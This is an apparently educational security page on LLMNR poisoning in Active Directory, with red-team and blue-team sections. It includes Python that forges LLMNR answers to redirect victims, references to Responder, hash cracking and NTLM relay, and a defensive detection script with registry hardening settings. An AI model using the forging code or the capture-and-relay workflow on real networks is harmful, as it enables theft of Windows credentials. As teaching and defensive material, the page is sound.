
LLMNR Poisoning

Listen for LLMNR queries on the local segment.
Respond with malicious answers claiming to be the requested host.
Capture Net-NTLMv2 challenge-responses when victims authenticate.
No credentials needed, just access to the victims' network segment.

Intermediate · Phase 2: Active Directory · Interactive Dual Perspective

LLMNR Poisoning

Active Directory Name Resolution Attack

Requires: Network access • Difficulty: Low • Impact: High


LLMNR (Link-Local Multicast Name Resolution) poisoning is an Active Directory attack that abuses Windows' fallback name-resolution protocol. When DNS cannot resolve a name, Windows sends an LLMNR query to the link-local multicast group 224.0.0.252 on UDP 5355. An attacker on the same segment answers with their own address, so the victim connects to an attacker-controlled share and sends an NTLMv2 challenge-response (Net-NTLMv2), which can then be cracked offline or relayed.

How LLMNR Works (Normal):

  1. User types \\fileserver in Windows Explorer
  2. The DNS query fails (fileserver is not in DNS, or the DNS server is unreachable)
  3. Windows falls back to LLMNR and multicasts "Who is fileserver?" to 224.0.0.252 on UDP 5355 (if nobody answers, it tries NBT-NS on UDP 137 next)
  4. The legitimate fileserver unicasts a response containing its IP address back to the querier
  5. User connects over SMB and authenticates with NTLM

Attack Exploit:

LLMNR has no authentication, and the querier accepts the first answer it receives. Any host on the segment can respond to an LLMNR query. Attackers listen for LLMNR queries, respond claiming to be the requested host, and capture the NTLMv2 authentication that follows when the victim tries to connect to them.

Why It's Effective: LLMNR has been enabled by default on Windows since Vista. Users frequently mistype share names or access resources that are not in DNS, and some software probes for names such as wpad on its own. Every failed DNS lookup triggers an LLMNR query, creating countless attack opportunities, and because NBT-NS is the next fallback, the attacker gets a second chance on hosts where only LLMNR has been disabled.
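The exchange in the steps above, as an added example that is not part of this page and not Responder's code: it builds the LLMNR query a victim multicasts for fileserver, the poisoned unicast answer a host at 192.168.1.150 (the simulator's attacker address) would return, and parses both. LLMNR reuses the DNS message format on UDP 5355; the transaction ID 0x1A2B and the 30-second TTL are arbitrary choices made for the example.

```python
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355
FLAG_QR = 0x8000              # "this is a response" bit in the DNS-style header


def encode_name(name: str) -> bytes:
    """'fileserver' -> b'\\x0afileserver\\x00' (DNS label format, which LLMNR reuses)."""
    out = b""
    for label in name.strip(".").split("."):
        out += struct.pack("!B", len(label)) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode a label sequence at off, following compression pointers; returns (name, next_off)."""
    labels, jumped, end = [], False, None
    while True:
        length = buf[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:                       # 2-byte compression pointer
            ptr = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            if not jumped:
                end = off + 2
            jumped, off = True, ptr
            continue
        off += 1
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """What the victim multicasts after DNS fails: header with QDCOUNT=1, one A/IN question."""
    header = struct.pack("!6H", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_message(buf: bytes) -> dict:
    """Parse an LLMNR query or response into its header, questions and answers."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from("!6H", buf, 0)
    off = 12
    questions, answers = [], []
    for _ in range(qdcount):
        name, off = decode_name(buf, off)
        qtype, qclass = struct.unpack_from("!HH", buf, off)
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(ancount):
        name, off = decode_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", buf, off)
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)             # A record -> dotted quad
        answers.append((name, rtype, ttl, rdata))
    return {"txid": txid, "is_response": bool(flags & FLAG_QR),
            "questions": questions, "answers": answers}


def build_poisoned_response(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """Answer whatever name was asked for with answer_ip. A legitimate host only answers
    for its own name; answering everything is exactly the poisoner's behaviour."""
    q = parse_message(query)
    name, qtype, qclass = q["questions"][0]
    header = struct.pack("!6H", q["txid"], FLAG_QR, 1, 1, 0, 0)   # same ID, QR set, 1 answer
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    # 0xC00C is a compression pointer to the name at offset 12 (start of the question)
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def open_listener() -> socket.socket:
    """Join the LLMNR multicast group on UDP 5355, as a real poisoner (or a sensor) does."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton("0.0.0.0")
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    return sock


if __name__ == "__main__":
    query = build_query(0x1A2B, "fileserver")                  # Workstation-01 -> 224.0.0.252:5355
    print("query   :", parse_message(query))
    poison = build_poisoned_response(query, "192.168.1.150")   # attacker -> victim (unicast)
    print("response:", parse_message(poison))
```

The response is sent unicast to the querier's source address and port, which is why a sensor that only watches the multicast group never sees the poisoning; capture on the victim side or mirror the segment.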

Legal & Ethical Warning

LLMNR poisoning techniques should only be used in authorized penetration testing, red team engagements, or controlled lab environments. Unauthorized access to computer systems is illegal under the CFAA and equivalent laws worldwide. Always obtain written permission before testing.

LLMNR Poisoning Attack Simulator

Broadcast Listening & NTLMv2 Hash Capture

Simulated lab topology (the interactive widget is not rendered here):

  • Workstation-01: 192.168.1.100 (victim)
  • Laptop-Sales: 192.168.1.101 (victim)
  • Responder (attacker): 192.168.1.150
  • DNS Server: 192.168.1.10, offline, so every lookup falls back to LLMNR

Attack phases:

  1. Listening for Broadcasts
  2. LLMNR Query Detected
  3. Poisoned Response
  4. Hash Capture
  5. Attack Complete

The widget lists captured Net-NTLMv2 hashes as they arrive.

🔴 RED TEAM: Attack Techniques

  • Responder Tool:
    Responder listens for LLMNR, NBT-NS and mDNS queries on the segment and answers them; it also runs rogue SMB, HTTP and other servers to receive the authentication that follows.
    No credentials required, just access to the victims' network segment.
  • Poisoned Response:
    DNS has already failed by the time LLMNR is used, so the race is only against other LLMNR responders, and the querier accepts the first answer.
    Claim to be the requested host.
    Victim connects to the attacker machine.
  • NTLMv2 Capture:
    The victim's SMB client automatically authenticates with the logged-on user's credentials.
    Responder records the Net-NTLMv2 challenge-response (hashcat mode 5600); by default it sends the fixed server challenge 1122334455667788.
    Crack offline with Hashcat/John. Net-NTLMv2 cannot be passed-the-hash, but it can be relayed live (for example with impacket's ntlmrelayx) to hosts that do not require SMB signing.
  • Low-Noise Attack:
    No scanning and no unsolicited traffic; the attacker only answers queries that victims send.
    Hard to detect without monitoring for LLMNR responses.

🔵 BLUE TEAM: Detection & Defense

  • Disable LLMNR/NBT-NS:
    Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution" = Enabled (registry equivalent: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, EnableMulticast = 0).
    NBT-NS is set per adapter: NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{GUID}, or push DHCP vendor option 001 "Microsoft Disable Netbios Option" = 2.
    Disabling only LLMNR just moves the fallback to NBT-NS, which Responder poisons too, so turn off both and use DNS exclusively.
  • Network Monitoring:
    Alert on an IP that answers LLMNR queries for many different names; a legitimate host only answers for its own name.
    Send canary queries for names that do not exist and alert on any answer.
    Use IDS signatures for Responder traffic.
  • Network Segmentation:
    Isolate critical systems on separate VLANs.
    LLMNR is link-local, so a poisoner can only reach victims on its own segment; keep multicast and broadcast traffic from crossing segments.
    Reduce attack surface significantly.
  • Strong Password Policy:
    Even if hashes are captured, strong passwords resist cracking.
    Enforce 15+ character passwords.
    Use passphrases instead of passwords.
    Cracking resistance does not stop relay, so also require SMB signing (and LDAP signing and channel binding) and reduce NTLM use where you can.
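The monitoring bullet above, as an added example that is not this page's code: detection logic run over a constructed, simplified log of LLMNR messages seen on UDP/5355. The log format is invented for the example (in practice you would feed it a Zeek dns.log filtered to port 5355 or an equivalent sensor export). It flags any host that answers for more than one name and any host that answers a canary name the defender queries for on purpose. The addresses follow the simulator topology; 192.168.1.200 is assumed to be a sensor that sends the canary queries, and 192.168.1.20 an ordinary printer that answers only for its own name.

```python
import secrets
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample log (not real traffic) of LLMNR messages on UDP/5355, one per line:
# "timestamp source destination Q|R name answer". Queries go to the multicast group,
# responses are unicast back to the querier. 192.168.1.150 is the poisoner.
SAMPLE_LOG = """\
1700000001.10 192.168.1.100 224.0.0.252   Q fileserver          -
1700000001.11 192.168.1.150 192.168.1.100 R fileserver          192.168.1.150
1700000002.40 192.168.1.101 224.0.0.252   Q printr01            -
1700000002.41 192.168.1.150 192.168.1.101 R printr01            192.168.1.150
1700000003.00 192.168.1.101 224.0.0.252   Q printer01           -
1700000003.01 192.168.1.20  192.168.1.101 R printer01           192.168.1.20
1700000004.00 192.168.1.200 224.0.0.252   Q llmnr-canary-7f3a9c -
1700000004.01 192.168.1.150 192.168.1.200 R llmnr-canary-7f3a9c 192.168.1.150
1700000005.00 192.168.1.100 224.0.0.252   Q wpad                -
1700000005.01 192.168.1.150 192.168.1.100 R wpad                192.168.1.150
"""

CANARY_PREFIX = "llmnr-canary-"   # assumed naming convention for the sensor's canary queries


@dataclass
class LlmnrRecord:
    ts: float
    src: str
    dst: str
    is_response: bool
    name: str
    answer: str


def parse_log(text: str):
    """Parse the constructed log format into records; names are lower-cased for comparison."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, qr, name, answer = line.split()
        records.append(LlmnrRecord(float(ts), src, dst, qr == "R", name.lower(), answer))
    return records


def make_canary_name() -> str:
    """A name to query deliberately: it exists nowhere, so any answer comes from a poisoner."""
    return CANARY_PREFIX + secrets.token_hex(3)


def detect_poisoners(records, max_names: int = 1):
    """Return (ip, reason) findings.
    Rule 1: a host answering for more than max_names distinct names (a real host answers
            only for its own name, so the default threshold is 1).
    Rule 2: any answer to a canary name."""
    names_by_responder = defaultdict(set)
    findings = []
    for r in records:
        if not r.is_response:
            continue
        names_by_responder[r.src].add(r.name)
        if r.name.startswith(CANARY_PREFIX):
            findings.append((r.src, f"answered canary name {r.name} to {r.dst}"))
    for ip, names in sorted(names_by_responder.items()):
        if len(names) > max_names:
            findings.append((ip, f"answered {len(names)} distinct names: {', '.join(sorted(names))}"))
    return findings


def suspect_ips(records):
    """Set of responder IPs that triggered at least one rule."""
    return {ip for ip, _ in detect_poisoners(records)}


if __name__ == "__main__":
    for ip, reason in detect_poisoners(parse_log(SAMPLE_LOG)):
        print(f"ALERT {ip}: {reason}")
```

Rule 2 is the cheaper one to run continuously: a scheduled job on a sensor host that resolves a fresh canary name every few minutes produces zero traffic of interest on a clean segment and a single, unambiguous alert the moment Responder starts answering.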
Copyright © 2025 JMFG. All rights reserved.